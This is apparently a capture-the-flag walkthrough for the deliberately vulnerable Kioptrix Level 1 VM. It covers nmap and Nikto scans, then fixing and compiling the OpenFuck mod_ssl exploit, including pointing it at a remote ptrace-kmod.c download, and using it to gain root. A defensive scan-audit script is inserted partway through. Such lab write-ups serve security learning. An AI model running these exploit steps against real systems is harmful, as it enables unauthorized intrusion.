Kioptrix Level 1 Hacking Challenge Walkthrough


This is a walkthrough for Kioptrix Level 1. Although getting root on this box is pretty straightforward, it is a great place for those looking to get their feet wet with boot2root VMs. I actually suggest this as a starting place rather than something like Metasploitable2, which is almost overwhelming with its list of vulnerabilities. The Kioptrix Level 1 VM can be downloaded from http://vulnhub.com/entry/kioptrix-level-1-1,22/

Footprinting:

After loading up the VM I used netdiscover -r to find its IP address, which was 192.168.2.90

Scanning:

Now it’s time to use Nmap to grab info about what ports and services are available.

[email protected]:~# nmap -sV -P0 -A 192.168.2.90

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 11:42 EDT
Nmap scan report for 192.168.2.90
Host is up (0.00069s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32768/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T08:32:06+00:00
|_Not valid after: 2010-09-26T08:32:06+00:00
|_ssl-date: 2014-08-13T19:43:04+00:00; +3h59m58s from local time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open status 1 (RPC #100024)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32768/udp status
MAC Address: 08:00:27:C4:86:B7 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 – 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)

TRACEROUTE
HOP RTT ADDRESS
1 0.69 ms 192.168.2.90

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.77 seconds

The first thing I noticed is that most of these services are pretty outdated, which is good news from an attacker's point of view. The second thing that grabs my attention is the version of Apache that is being run. There are clearly several different services running that may provide a foothold into the box, but I decided to stick with Apache since it caught my eye. I fire up Iceweasel and find a default-looking Apache page running on the webserver. Now to run Nikto to see what kind of information it can gather about the webserver.
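As an added illustration (not part of the original walkthrough), the following Python script reads Nmap service-detection output like the scan above and flags what a defender would want to fix on this host: SSHv1, SSLv2, HTTP TRACE, an expired certificate, and product versions below a policy floor. The sample input and the version floors are constructed for the example; the floors mirror the fixed versions Nikto reports later on this page.

```python
import re

# Constructed sample: lines mirroring the Nmap -sV output in the walkthrough above.
SAMPLE_SCAN = """\
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_Not valid after: 2010-09-26T08:32:06+00:00
| sslv2:
| SSLv2 supported
"""

# Matches a port line such as "80/tcp open http Apache httpd 1.3.20 (...)".
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

# Assumed policy: minimum acceptable versions (illustrative, not a real baseline).
MIN_VERSIONS = {"Apache httpd": (1, 3, 27), "mod_ssl": (2, 8, 8), "OpenSSL": (0, 9, 7)}

def parse_version(text):
    """Return the first dotted numeric version in text as an int tuple, or None."""
    m = re.search(r"(\d+(?:\.\d+)+)", text)
    return tuple(int(x) for x in m.group(1).split(".")) if m else None

def audit_scan(text, scan_date):
    """Walk Nmap output and return (port, finding) pairs; scan_date is YYYY-MM-DD."""
    findings, port = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, _, _, banner = m.groups()
            for product, floor in MIN_VERSIONS.items():
                if product in banner:
                    ver = parse_version(banner.split(product, 1)[1])
                    if ver and ver < floor:
                        findings.append((port, f"{product} {'.'.join(map(str, ver))} below floor"))
            continue
        # Script-output lines belong to the most recent port line.
        if "Server supports SSHv1" in line:
            findings.append((port, "SSHv1 enabled"))
        elif "SSLv2 supported" in line:
            findings.append((port, "SSLv2 enabled"))
        elif "Potentially risky methods" in line and "TRACE" in line:
            findings.append((port, "HTTP TRACE enabled"))
        elif line.startswith("|_Not valid after:"):
            expiry = line.split(":", 1)[1].strip()[:10]  # ISO date sorts as a string
            if expiry < scan_date:
                findings.append((port, f"TLS certificate expired {expiry}"))
    return findings

if __name__ == "__main__":
    for port, finding in audit_scan(SAMPLE_SCAN, "2014-08-13"):
        print(f"port {port}: {finding}")
```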

Enumeration:

[email protected]:~# nikto -h 192.168.2.90
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.2.90
+ Target Hostname: 192.168.2.90
+ Target Port: 80
+ Start Time: 2014-08-13 11:44:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with ‘Forbidden’ for users, ‘not found’ for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 – Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 – Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 – Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra ‘/’ to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting…
+ 7355 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2014-08-13 11:44:53 (GMT-4) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Gaining Access:

Ok so the first thing that Nikto returns is

+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

I do a simple Google search to see if there are any obvious exploits that fit my needs.

Well the first result seems to fit the bill quite well. Now I’m going to use searchsploit to see if I’ve already got this exploit.

[email protected]:~# searchsploit apache openssl
Description Path
------------------------------------------------------------- ----------------------------------
Apache OpenSSL – Remote Exploit (Multiple Targets) (OpenFuck | /linux/remote/764.c

Alright, now it’s time to copy this into my /tmp/exploit directory and see what we’ve got.

Ok so the very first section gives us what we need.

/*
* http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
*/

If you try to compile this without changing the code you'll end up with a bunch of errors and issues.

[screenshot: badcompile]

Luckily the paulsec write-up is very straightforward. So here are the changes I made.

Here are the steps I used to get this to compile in VI.
1) Add these two headers:
#include
#include

2) Update the URL of the C file:
Search for packetstorm and replace the URL with the following

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

3) Install the libssl-dev library if you don't have it already:

apt-get install libssl-dev

4) Update the declaration of variables:
Search for
unsigned char *p
and change it to
const unsigned char *p, *end;
5) Compile the code and Bob's your uncle:
To compile:
gcc -o exploit 764.c -lcrypto
[screenshot: goodcompile]

So the exploit compiled without any issues this time. Now it’s time to move in for the kill.

[email protected]:/tmp/exploit# ./exploit | grep -i redhat | grep "1.3.20"

[screenshot: grepexploit]

This shows me that I've got two options for this exploit, so I first try 0x6a, but it doesn't quite work out.

[screenshot: 1stattempt]

So I try the second, which is 0x6b, and decide to add a range of 40 connections for a better shot at getting this to work.

[screenshot: 2ndattempt]

And there it is. Root access on Kioptrix Level 1. Feel free to leave feedback and questions in the comments.
